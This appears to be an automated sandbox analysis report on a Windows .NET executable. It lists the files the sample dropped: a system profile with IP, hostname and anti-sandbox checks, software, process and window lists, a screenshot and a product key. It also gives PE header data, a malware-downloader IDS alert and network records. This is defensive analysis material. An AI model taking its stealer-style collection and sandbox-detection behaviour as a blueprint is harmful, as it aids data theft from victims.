                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1446
                                                                                                                                                            Entropy (8bit):5.407572469297613
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:OKkf6JgXJ/lf3Jgd/5f6JgnQPUCddMfoHJTl5mfFKJTlNg8OfpJTlmfNJeikpqPm:lkf6JgXBlf3JgN5f6JgQPxdSfmJZwfFR
                                                                                                                                                            MD5:CEE54E135C6B81CDEAA9DFD5EA03C478
                                                                                                                                                            SHA1:AF1F82275F492BCAD22E069E85CCD3E0F2FC2B56
                                                                                                                                                            SHA-256:0766F4E7D7D88AF7F4EAE72FAD244BFDA8CFB0CA978CE238F321ACE705BF378F
                                                                                                                                                            SHA-512:F83AB89E6E68AB57AB50B278F9CFFC3F9D3FA86B692A3495070BFD29C06A2A25B89E8E40AEE48C11264C1F945079062F6B24A1EEA805DEB2916D388BBE3E92B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.APP: Office 16 Click-to-Run Extensibility Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008C-0000-0000-0000000FF1CE}...APP: Office 16 Click-to-Run Extensibility Component 64-bit Registration..VERSION: 16.0.16827.20056..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-00DD-0000-1000-0000000FF1CE}...APP: Office 16 Click-to-Run Licensing Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008F-0000-1000-0000000FF1CE}...APP: Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532..VERSION: 14.36.32532..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {0025DD72-A959-45B5-A0A3-7EFEB15A8050}...APP: Java 8 Update 381..VERSION: 8.0.3810.9..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {77924AE4-039E-4CA4-87B4-2F32180381F0}...APP: Adobe Acrobat (64-bit)..VERSION: 23.006.20320..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {AC76BA86-1033-1033-
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):72819
                                                                                                                                                            Entropy (8bit):7.8047047737072575
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:CU3N0VqF+MYyCb9CUeC0ih65Wp2RHBwT1pW+85f8Dz1dePhA5a4rD:PNqqF+MYTb9cih65Wp388D3iag8D
                                                                                                                                                            MD5:796BA6992C3E3156DCD0D3F11DAD94B5
                                                                                                                                                            SHA1:EA6F5991B8D2BE90529BAFAB7056DB30BECDE1DA
                                                                                                                                                            SHA-256:CBDD07B0368720E53B2944199812C5FAA891A2CA97B45C6840D5D88855B25793
                                                                                                                                                            SHA-512:FC180E345D3EC9924B7E17488D001C28B0476A5D1491C245BCD20E432FDE84ABC55BE5AFA08151EE286DFB09FEA66FB1DA69389685EA6E2D15028450190FE951
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):507
                                                                                                                                                            Entropy (8bit):5.406620525110782
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:RFNbwPRbVkb21Exa2Y3PtPjtszJxsWWvdUXyR:3VwP/kbXxaRFPjtQJxsWdS
                                                                                                                                                            MD5:4E386C1A249C14E4B6EBA42BA69C0B6C
                                                                                                                                                            SHA1:9B7B5D157D18F61F4D86ABEEAEA34530FBD3A6B1
                                                                                                                                                            SHA-256:59A48AD0131DCB1BCF5A88C31253C6AEE1459CD3F819D8EA6FDF509D179D66FD
                                                                                                                                                            SHA-512:D295EFC93C534392282E16AC84A897EBD66ADCDC4E5E488DF5C7A9ED445A8DBC3F98F22A74FDFA1AE9FFB78B9D20B90EE0AA27E8C254B639C8EC00DC607281AC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.[IP].External IP: 8.46.123.228.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 910646.System: Microsoft Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: KXODMN.RAM: 4095MB.DATE: 2024-11-29 6:28:24 am.SCREEN: 1280x1024.BATTERY: NoSystemBattery (100%).WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Processes: False.Hosting: False.Antivirus: Windows Defender.
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17835
                                                                                                                                                            Entropy (8bit):5.670240203559194
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:eXAaC23rql9gUEBxwazqSt4XdiBqwVJC1F48sjQAytjWVOwsJ2:ePqHgUEkambIqwm1F48sjQAytjWZW2
                                                                                                                                                            MD5:C0E28C6D0726E302120783E9B9C6E5C8
                                                                                                                                                            SHA1:A5BE121662AD603C44983A97B962EDA02729DBC9
                                                                                                                                                            SHA-256:62A645710A6B945159B57B5CE15A4EE5F14A03E5450077FFF58C78F10A3422CC
                                                                                                                                                            SHA-512:6483E3F2DD5DF8B6FC41F1CCBF3B633E449152044A2CD9CFD33FF8CA3A31440606EB788D522DB2FB777B1F8ECF82EAC2BEFFFE1024E2CEF015BE3206B4504A33
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 6460..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: dllhost..PID: 5164..EXE: C:\Windows\system32\DllHost.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 6996..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 6020..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 6648..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 1704..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQ
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):31
                                                                                                                                                            Entropy (8bit):3.8456631498513816
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:TrY8NQuj8nscDn:Y8NQshM
                                                                                                                                                            MD5:991AAE770DEC8D669F219C991EF185AA
                                                                                                                                                            SHA1:CA63CA3991FD4C2AAB57D8BAFF1B22272789681F
                                                                                                                                                            SHA-256:7F59C7B737DA1C262BBF77911EEC65AE807DB196EA51C7FD0E20B3F3651607D0
                                                                                                                                                            SHA-512:416C01BD586832EB4F922241604BBAA80488839819ED2019A7F4205386445503C611BA36A764286999CF9EAA6B3417B7F2E37AD737F546AA7CE0811C2179C30A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:DPJN2-KRCMC-XRBRJ-KFYBM-CH9C2-4
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13711
                                                                                                                                                            Entropy (8bit):5.601840736862827
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:FFoDoNo1opoAowoZo3i5bez/oZoyByzFMazoqogoAHoNHoaohFoINoNNofokoZH5:e5/yzq/QILpCjf6
                                                                                                                                                            MD5:5F02954184FBA3D0EC2E203E78EE9DD4
                                                                                                                                                            SHA1:0E7155C853DC2A68EBD2778CDBE22A5F86269E3D
                                                                                                                                                            SHA-256:292B13F3BCFC8225C7DB431F8524B08E1702EA385BDB2419F1EE584A32B09DCE
                                                                                                                                                            SHA-512:FEA9B72294003BB17C229046C199D3A968DE45CAAE39C24EA73505A601C553FD329E639A1FD4B471B573B7D7E2BFFF43BDED3204A1D579C754DE5DDE481C051F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6460..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6996..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6020..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6648..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 1704..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6872..EXE: C:\Program Files (x86)\fFFLPcmfn
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                            Entropy (8bit):4.465627219671438
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:qIXfpi67eLPU9skLmb0b41WSPKaJG8nAgejZMMhA2gX4WABl0uNNdwBCswSbI:fXD941WlLZMM6YFHT+I
                                                                                                                                                            MD5:E82FD1AB2AA9F353E313C14F5FF12D4F
                                                                                                                                                            SHA1:7233181F09305086A1019777F5F7DE8CF1512090
                                                                                                                                                            SHA-256:35D3E6F0492FBE8D0119CABB4D1604CACE1D30E5B40842CF8EBE5A48AB124E93
                                                                                                                                                            SHA-512:6A6C058C93452DEF36E96263B9F70BB7265B5AAD0DEC6A3A4891C343F14D787A440EAD43505C0B6A77D21FA379A3E88A936555C6C2DB4806BA36FE09FB8C929D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.r..QB.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):7.975024693229074
                                                                                                                                                            TrID:
                                                                                                                                                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                                                            • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                                                            • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.46%
                                                                                                                                                            File name:K6aOw2Jmji.exe
                                                                                                                                                            File size:3'747'840 bytes
                                                                                                                                                            MD5:98a0c65bc0fe05d40971716ffd216519
                                                                                                                                                            SHA1:29725d1d174fb10d919a6f5b5f5ca2d2d83485af
                                                                                                                                                            SHA256:09f6e63d0518f1bebd5b74b8a4ba868d0843bc85922e85aefd94d20405e858d2
                                                                                                                                                            SHA512:eca2ccd20a452f3a1f46a2b880634c779551e03575bc99746a5e3baef63fe3b8579dd8199c42cc6c65f112f70c337ef509efd4c3d84f1b9aa597a03c907f8b64
                                                                                                                                                            SSDEEP:98304:okqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13:okSIlLtzWAXAkuujCPX9YG9he5GnQCAo
                                                                                                                                                            TLSH:B906234077F4465AE5FF6F78E87122109E367A079836D74C2998208C0FB2B85ED26B77
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0...9.............. ....@...... .......................`9...........`...@......@............... .....
                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                            Entrypoint:0x400000
                                                                                                                                                            Entrypoint Section:
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0xEBE8C2F3 [Fri Jun 3 00:40:19 2095 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:
                                                                                                                                                            Instruction
                                                                                                                                                            dec ebp
                                                                                                                                                            pop edx
                                                                                                                                                            nop
                                                                                                                                                            add byte ptr [ebx], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax+eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3940000x1228.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x39382c0x1c.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x50.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x20000x3918480x391a0061a407b873d556b064687658424eea31unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0x3940000x12280x14000bbbc31fdf68ff984f237f8ea19f1735False0.3568359375data4.832740054505843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_VERSION0x3940900x348data0.43214285714285716
                                                                                                                                                            RT_MANIFEST0x3943e80xe3bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.38649464726873456
                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                            2024-11-29T12:28:35.552128+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449738104.16.185.24180TCP
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 29, 2024 12:28:26.590441942 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.590482950 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.590558052 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.613230944 CET49734443192.168.2.4185.199.108.133
